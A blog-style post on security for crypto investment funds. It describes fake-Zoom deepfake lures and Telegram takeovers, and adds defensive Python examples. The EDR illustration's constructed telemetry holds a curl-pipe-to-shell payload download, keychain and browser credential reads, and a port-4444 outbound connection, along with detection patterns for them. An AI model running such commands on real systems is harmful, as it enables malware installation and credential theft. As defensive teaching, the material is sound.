You've been around the digital assets space long enough to be savvy. You've seen people get burned because they were sloppy with a keyphrase. You got SIM-swapped a few years ago: nothing awful happened, but you learned the lesson and have that locked down. You've got YubiKeys on your important wallets and credentials, and you've set up multi-sig where it counts. You run a VPN, have two-factor auth on everything, and use your password manager like a wizard. And you're so good at spotting phishing emails, you're the unofficial firm expert who trains everyone else.
So how did you just get SIM-swapped again?
And how did you miss that the email you just replied to, seemingly from a GP, was actually a phish?
And what about everyone else in your firm whose OPSEC isn't on par with yours?
The current truth is stark: your personal OPSEC (operational security) skills and instincts are quickly losing ground to increasingly sophisticated adversaries. Augmented by AI, the new crop of attacks and social engineering are much harder to detect. Now, it's not a matter of if, but when you'll accidentally click on that link.
State-sponsored groups, organized criminal operations, and social engineering rings stole over $2 billion from the digital asset space in 2025. (That's the disclosed figure – the actual losses are higher.) The firms getting hit did not have zero security. Most had security-conscious individuals like you. What they lacked was a multilayered comprehensive security program, maintained by someone responsible.
Two years of building security programs for digital asset funds has made that gap the thing I'm most focused on: the space between what an individual can do and what a firm actually needs.
The threat environment has changed from a year ago
Not your father's phishing attempts
The phishing attempts of the past were fairly easy to spot once you learned the patterns. Today's phishing and Business Email Compromise (BEC) attacks can fool even the savviest: attackers construct messages from scraped websites, LinkedIn data, public filings, and blockchain analytics, then refine them with AI to match the tone and communication style of people you actually work with. I've seen emails that seemed to come from colleagues, complete with forwarded threads simulating convincing conversations with colleagues or superiors. When an EA gets an email from 'their manager' saying "Pay this training invoice for $10k please, it's past due", it's much harder to spot.
The Telegram Jungle
For digital asset firms the attack vectors go far beyond email. We live on Telegram, but Telegram is a war zone: there's no identity verification, spam and fake accounts are rampant, and most people haven't taken precautions to secure their accounts. So account takeovers are constant, and under the pressure of the moment even the most security-conscious of us can falter.
Example: you get a Telegram message from a fund manager or investor you've been hoping to talk to for months, inviting you to a Zoom call, and you jump at the chance. The invite looks normal and legitimate. When you join the Zoom you see your contact on video, but they're gesturing that they can't hear you, and a Zoom pop-up tells you that you must upgrade your audio drivers. Your important contact is waiting right there and you don't want to waste their time, so you accept the pop-up or run the suggested commands. Congratulations! You've just installed sophisticated malware.
Let's break down what happened here:
- Your contact got their Telegram account taken over due to weak security
- You trusted they were who they seemed to be and did not confirm the Zoom invite through a different channel
- The call wasn't Zoom at all but an elaborate fake that copied the Zoom UI, designed to trick you into installing malware. And the video of your contact? That wasn't them either: it was a deepfake the attackers created.
- The 'Zoom upgrade' commands you entered installed sophisticated malware designed to steal passwords and hack crypto wallets.
Similar attacks are rampant in the crypto sector right now. How do you protect against this?
You or someone in your firm will eventually be fooled. The attacks are now good enough that you must bake this into your planning. The real question for your firm is: do you have security layers in place to protect against what individual OPSEC will miss? If not, that breach could be existential.
What personal OPSEC was built to do
The security skills and instincts you've built are all genuinely valuable. They raise the cost of certain attacks and close real vulnerabilities. But their effectiveness is fading in the face of these new threats. And even then, they were designed to protect an individual operating largely on their own.
Running a fund is different. You have shared systems – exchange accounts, custodians, cloud infrastructure, internal tools – with access distributed across a team. People join and leave. Contractors come in for projects and wrap up. Devices that may or may not meet any baseline security standard connect to trading infrastructure. The credential surface expands and contracts in ways that nobody is tracking in real time, because in a lean fund, that's nobody's job.
Personal OPSEC operates on the assumption that you'll catch the threat before it reaches the system. Firm-level security operates on the assumption that sometimes you won't – and builds layers that protect you anyway.
Defense-in-depth
Defense in depth is a strategy that leverages multiple security measures to protect an organization's assets. The thinking is that if one line of defense is compromised, additional layers exist as a backup to ensure that threats are stopped along the way. Defense in depth addresses the security vulnerabilities inherent not only in hardware and software but also in people, as negligence or human error is often the cause of a security breach.
This is the concept most security-aware fund operators are missing, because it requires having run an actual security program rather than a series of individual security decisions. What are some of the layers?
Endpoint detection and response. Think of this as antivirus on steroids. When a device gets compromised – through a convincing Zoom call that ends with a terminal command, a malicious download, a link that caught someone at a tired moment – the window between initial infection and the malware establishing persistent access is short. EDR software monitors device behavior in real time, looking for odd behavior: writing executables to system directories, making unusual outbound connections, reaching into password stores. EDR flags those signals, kills the malicious process, and alerts you so you can take appropriate action. Without it, the first sign of a compromise is whatever the malware does after it's had time to settle in. Most BYOD fund environments have no endpoint detection at all.
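As an added illustration of the behavioral signals just listed (this is not code from the post or from any EDR product), here is a toy correlator run over constructed endpoint events modeled on the fake-Zoom scenario above. The event format, the watched paths and the two-signal threshold are assumptions; a real EDR also follows child processes, which this omits.

```python
import json
import re

# Constructed sample telemetry (not real EDR output): one JSON event per line.
SAMPLE_EVENTS = """\
{"type":"process","pid":4102,"parent":"Zoom Upgrade Helper","cmdline":"sh -c 'curl -fsSL https://updates.example.invalid/audio.sh | sh'"}
{"type":"file_write","pid":4102,"path":"/Library/LaunchDaemons/com.audio.update.plist"}
{"type":"file_write","pid":4102,"path":"/usr/local/bin/audiod"}
{"type":"file_read","pid":4102,"path":"/Users/ea/Library/Keychains/login.keychain-db"}
{"type":"file_read","pid":4102,"path":"/Users/ea/Library/Application Support/Google/Chrome/Default/Login Data"}
{"type":"network","pid":4102,"dst":"203.0.113.45","port":4444}
{"type":"process","pid":4200,"parent":"launchd","cmdline":"curl -s https://api.example.invalid/prices"}
{"type":"network","pid":4200,"dst":"198.51.100.7","port":443}
"""

# Persistence and system locations an ordinary user app has no business writing to (assumed list).
SYSTEM_DIRS = ("/Library/LaunchDaemons/", "/Library/LaunchAgents/", "/usr/local/bin/", "/etc/")
# Password and wallet stores this kind of malware goes after (assumed list).
CREDENTIAL_STORES = ("/Library/Keychains/", "/Login Data", "/.ssh/", "wallet")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b")
EXPECTED_PORTS = {80, 443}

def classify(event):
    """Return the behavioral signal an event triggers, or None if it looks benign."""
    t = event["type"]
    if t == "process" and PIPE_TO_SHELL.search(event.get("cmdline", "")):
        return "pipe_to_shell"
    if t == "file_write" and event["path"].startswith(SYSTEM_DIRS):
        return "system_dir_write"
    if t == "file_read" and any(m in event["path"] for m in CREDENTIAL_STORES):
        return "credential_store_access"
    if t == "network" and event["port"] not in EXPECTED_PORTS:
        return "unusual_outbound"
    return None

def signals_by_pid(events_text):
    """Group the distinct signals seen per process id."""
    found = {}
    for line in events_text.splitlines():
        if line.strip():
            ev = json.loads(line)
            sig = classify(ev)
            if sig:
                found.setdefault(ev["pid"], set()).add(sig)
    return found

def processes_to_kill(events_text, threshold=2):
    """One signal is noise; two or more distinct signals on one process is an alert."""
    return sorted(pid for pid, sigs in signals_by_pid(events_text).items() if len(sigs) >= threshold)
```

`processes_to_kill(SAMPLE_EVENTS)` returns `[4102]`; the benign price fetch on pid 4200 trips nothing, which is the point of correlating several signals rather than alerting on any single one.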
Network-level filtering. Every internet connection starts with a DNS lookup. Routing that through a security gateway blocks known malicious and command-and-control domains before a connection is ever made – stopping a significant share of attack payloads at the network layer, before they reach the user, regardless of whether the user recognized the threat. A consumer VPN does not reliably do this. Most handle DNS inconsistently, in ways that vary by operating system and network and are invisible to the user. The protection that feels like it's there often isn't, on any given connection.
Browser isolation. For the highest-risk browsing – counterparty due diligence, following links from Telegram, anything involving unknown sources – running the browser session in an isolated environment means that whatever lands on the page can't reach the underlying device. The session is disposable. The device isn't.
Identity infrastructure. A real identity provider, with every SaaS system gated through SSO, means access is granted and revoked in one place. When someone leaves, you disable their account in the IDP and they're out of everything – exchanges, cloud infrastructure, internal tools, all of it – rather than having to remember which systems they had access to and chase each one down manually. Onboarding works the same way in reverse. Without this, the credential surface of a firm that's been operating for a few years is almost certainly larger than anyone can accurately account for.
Credential surface audit. Even with good identity infrastructure going forward, most firms have years of accumulated access that predates it. Former employees often retain live API keys to exchanges; contractors leave behind admin access that outlasted their projects; shared accounts accumulate passwords that multiple people know and nobody owns. Getting a current, accurate picture of who has access to what – and then closing the gaps – is unglamorous work. It's also where a significant share of low-effort attacks find their entry point.
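The identity-infrastructure and credential-surface points above come down to one reconciliation: compare every standing credential against the IdP's active user list and the contractor roster. Here is an added example of that reconciliation (not the post's own tooling) over constructed records; the record shapes, the 30-day dormancy window and the finding names are assumptions.

```python
from datetime import date

# Constructed sample records (not a real firm's data). In practice these come from
# the IdP's user export, each venue's API-key listing, and the contractor roster.
IDP_ACTIVE = {"ana@fund.example", "ben@fund.example", "cy@fund.example"}
CONTRACTOR_END = {"dee@contractor.example": date(2025, 6, 30)}
EXCHANGE_KEYS = [
    {"venue": "exchange-a", "key_id": "k-101", "owner": "ana@fund.example", "perms": {"trade"}, "last_used": date(2025, 10, 29)},
    {"venue": "exchange-a", "key_id": "k-102", "owner": "lou@fund.example", "perms": {"trade", "withdraw"}, "last_used": date(2025, 9, 2)},
    {"venue": "exchange-b", "key_id": "k-201", "owner": "dee@contractor.example", "perms": {"admin"}, "last_used": date(2025, 10, 15)},
    {"venue": "exchange-b", "key_id": "k-202", "owner": None, "perms": {"read"}, "last_used": date(2024, 1, 5)},
]
SHARED_ACCOUNTS = [
    {"system": "custodian-portal", "owner": None, "holders": ["ana@fund.example", "ben@fund.example", "lou@fund.example"]},
]
PRIVILEGED = {"withdraw", "admin"}

def audit_keys(keys, idp_active, contractor_end, today, dormant_days=30):
    """Flag API keys whose owner is gone or unknown, and privileged keys nobody is using."""
    findings = []
    for k in keys:
        where, owner = f"{k['venue']}/{k['key_id']}", k["owner"]
        if owner is None:
            findings.append(("unowned_key", where, "no accountable owner: rotate or revoke"))
        elif owner in contractor_end and contractor_end[owner] < today:
            findings.append(("expired_contractor_access", where, f"{owner} engagement ended {contractor_end[owner]}"))
        elif owner not in idp_active and owner not in contractor_end:
            findings.append(("former_employee_key", where, f"{owner} is not an active IdP user: revoke"))
        if k["perms"] & PRIVILEGED and (today - k["last_used"]).days > dormant_days:
            findings.append(("dormant_privileged_key", where, f"{sorted(k['perms'] & PRIVILEGED)} unused for >{dormant_days} days"))
    return findings

def audit_shared(accounts, idp_active):
    """Shared logins: someone must own them, and a departed holder forces a rotation."""
    findings = []
    for a in accounts:
        if a["owner"] is None:
            findings.append(("unowned_shared_account", a["system"], "assign an owner or retire the account"))
        departed = [h for h in a["holders"] if h not in idp_active]
        if departed:
            findings.append(("shared_secret_known_to_departed", a["system"], f"rotate: known to {departed}"))
    return findings

def credential_surface_audit(today=date(2025, 11, 3)):
    """Run both audits over the sample data and return the combined findings."""
    return audit_keys(EXCHANGE_KEYS, IDP_ACTIVE, CONTRACTOR_END, today) + audit_shared(SHARED_ACCOUNTS, IDP_ACTIVE)
```

On the sample data this surfaces six findings: a former employee's live withdraw-capable key (also dormant), a contractor's admin key that outlived the engagement, an ownerless key, and a shared custodian login that has no owner and is known to someone who has left.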
Communication channel protocols. Telegram is the primary communication channel for much of the crypto industry and its primary attack surface. When an account gets compromised, an attacker gains access to months of organizational context – enough to make the impersonation attacks that follow genuinely hard to detect in the moment. Strong second-factor authentication on every account, hardened specifically against SIM-swap, is a firm-level decision. So is having an explicit protocol – not a norm, a protocol – for verifying identity before any sensitive action, in an environment where real-time deepfake calls are an active vector.
Why most firms don't have this in place
None of these layers are exotic or particularly expensive relative to what they protect. And you're probably familiar with most of these concepts at some level. But building and maintaining these layers requires someone to own the whole picture, and in a lean fund, that's nobody's job.
Security decisions get made in response to moments of concern. Something happens in the industry, or someone reads about a new attack, and a decision gets made. Each decision is reasonable. Nobody reviews whether it still holds six months later. Nobody notices what's missing from the overall posture. Nobody owns the program to evolve it in response to the threats.
The result is a firm where the security-aware people have done the personal OPSEC work, and the firm-level infrastructure either doesn't exist or was set up once and never maintained. That gap was exploitable before the current wave of attacks. It's more exploitable now.
Closing it doesn't require a full-time hire. It requires someone senior enough to see the whole picture and accountable enough to keep it current – someone who reviews access on a regular cadence, responds when something flags, and updates the program as the threat environment changes.
The attacks have gotten good enough to treat individual vigilance as a solved problem – something to route around rather than overcome. The structural layers are what contain the damage when that happens. For most funds, building them is still nobody's job.